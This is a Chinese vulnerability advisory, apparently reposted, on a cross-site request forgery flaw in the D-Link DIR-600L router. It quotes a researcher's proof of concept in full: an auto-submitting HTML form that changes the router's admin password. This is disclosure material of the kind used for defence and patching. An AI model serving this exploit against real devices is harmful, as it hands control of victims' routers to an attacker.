600L跨站请求伪造漏洞

发布日期:2014-03-24
更新日期:2014-03-25

受影响系统:
D-Link DIR-600L
描述:
--------------------------------------------------------------------------------
D-Link DIR-600L是款无线路由器产品。
 
D-Link DIR-600L修订版A1固件版本1.0、修订版B1固件版本2.0,没有正确检查某些请求的合法性,这可使某些用户通过HTTP请求执行未授权操作。
 
<*来源:Dhruv Shah
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
####################################################################################

# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00
 CSRF Vulnerability
 # Google Dork: N/A
 # Date: 20/03/2014
 # Exploit Author: Dhruv Shah
 # Vendor Homepage:
 
 # Software Link: N/A
 # Hardware Version:E4

# Firmware Version:5.10
 # Tested on: Router Web Server
 # CVE : N/A

###################################################################################

Cross Site Request Forgery

This Modem's Web Application , suffers from Cross-site request forgery

through which attacker can manipulate user data via sending him malicious

craft url.

The Modems's Application  not using any security token to prevent it

against CSRF. You can manipulate any userdata. PoC and Exploit to change

user password:


 In the POC the IP address in the POST is the modems IP address.

<html>

<body>
    <form id ="poc" action="http://192.168.0.1/goform/formSetPassword"
 method="POST">
      <input type="hidden" value="1" />
      <input type="hidden" value="admin" />
      <input type="hidden" value="YWRtaW4A" />
      <input type="hidden"
 name="config.web_server_allow_graphics_auth"
 value="false" />
      <input type="hidden"
 name="config.web_server_allow_wan_http" value="false" />
      <input type="hidden"
 name="config.web_server_wan_port_http" value="8080" />
      <input type="hidden"
 name="config.wan_web_ingress_filter_name" value="" />
      <input type="hidden"
 value="" />
    </form>
  </body>
    <script type="text/Javascript">
 document.getElementById("poc").submit();
 </script>

</html>


 ______________________

*Dhruv Shah* *aka Snypter*

Blogger | Researcher | Consultant | Writer
 Youtube <> |
 Facebook<>|
 Linkedin <> |
 Twitter<https://twitter.com/Snypter>|
 Blog <>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/f80654b9a5db5ac770e164ea8bcd352a.html